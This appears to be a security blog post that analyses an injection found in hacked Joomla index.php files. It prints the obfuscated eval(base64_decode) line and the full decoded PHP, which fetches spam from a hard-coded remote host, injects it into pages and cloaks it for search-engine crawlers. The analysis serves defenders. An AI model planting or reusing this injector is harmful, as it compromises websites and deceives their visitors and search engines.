This isn’t particularly new, but is still being injected into some compromised Joomla sites.  In the /index.php file and /administrator/index.php file, the last few lines of legitimate code look like this (at least in 1.5.x):

/**
* RETURN THE RESPONSE
*/
echo JResponse::toString($mainframe->getCfg('gzip'));

The hacked version changes it to this:

/**
* RETURN THE RESPONSE
*/
$JResp = JResponse::toString($mainframe->getCfg('gzip'));
/*rrt*/
eval(base64_decode("DQokY291bnRfdXJsID0gMzA7IC8vyu7[...]mwpOw0KfQ=="));
$JResp = str_ireplace("</head>", "</head>".$code, $JResp);
echo $JResp;

The code basically just alters the output to add spam into the body of the page.  The encoded part (which will vary between hacked versions as it contains a hard-coded URL that the hackers are changing), when decoded, looks like this (I’ve removed the original code comments which were garbled and added my own comments to explain things):

$count_url = 30;
$static = 0
$id = 1;
$count_s = 5;
$cloaca = 1;
// address will vary as hackers cycle through hosts
$host = "http://dnsservertest1.com/index.php";

// complete URL: http://dnsservertest1.com/index.php?count=30&static=0&id=1&count_s=5
$url = $host."?count=".$count_url."&static=".$static."&id=".$id."&count_s=".$count_s;

// downloads the contents of $url using PHP's file_get_contents() built-in function
function geturl_1($url)
{
return file_get_contents($url);
}

// downloads $url using PHP network socket functions
function geturl_2( $sock,$host, $path, $query )
{
fputs($sock, "GET " . $path . "?" . $query . "  HTTP/1.0\r\n" .
"Host: $host\r\n" .
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\r\n" .
"Accept: */*\r\n" .
"Accept-Language: en-us,en;q=0.5\r\n" .
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" .
"Keep-Alive: 300\r\n" .
"Connection: keep-alive\r\n" .
"Referer: http://$host\r\n\r\n");
while ( $line = fread( $sock, 4096 ) )
{
$response .= $line;
}
fclose( $sock );
$pos      = strpos($response, "\r\n\r\n");
$response = substr($response, $pos + 4);
return $response;
}

// downloads $url using PHP's curl functions
function geturl_3($url)
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}

// checks the User-Agent string for Google, Yahoo, and Bing
function getuseragent($useragent)
{
if( stripos($useragent, 'googlebot') || stripos($useragent, 'slurp') || stripos($useragent, 'msnbot'))
{
return 1;
}
return 0;
}

// executes whichever of the URL downloading functions will work
function mainwork($url)
{
if( ini_get("allow_url_fopen") == 1)
{
echo geturl_1($url);
}
else
{
$url_1 = parse_url($url);
if($sock = @fsockopen($url_1['host'], 80))
{
echo geturl_2( $sock, $url_1['host'], $url_1['path'], $url_1['query'] );
}
elseif( @function_exists('curl_init') )
{
echo geturl_3($url);
}
}
}

// checks the cloaking option to optionally hide the spam from Google/Yahoo/Bing
if( $cloaca && getuseragent($_SERVER['HTTP_USER_AGENT']) )
{
mainwork($url);
}
elseif($cloaca == 0)
{
mainwork($url);
}

In a nutshell, the code downloads whatever is present at the hard-coded URL, and then inserts it right after the </head> tag in the page that Joomla is preparing to render.  It’s been used to display spam links.This code obviously targets Joomla and is inserted into specific files.  It’s not difficult to clean up, but the greater question is how the hackers inserted it… if you’ve found it in your files and are unsure how to continue, contact us for professional incident response!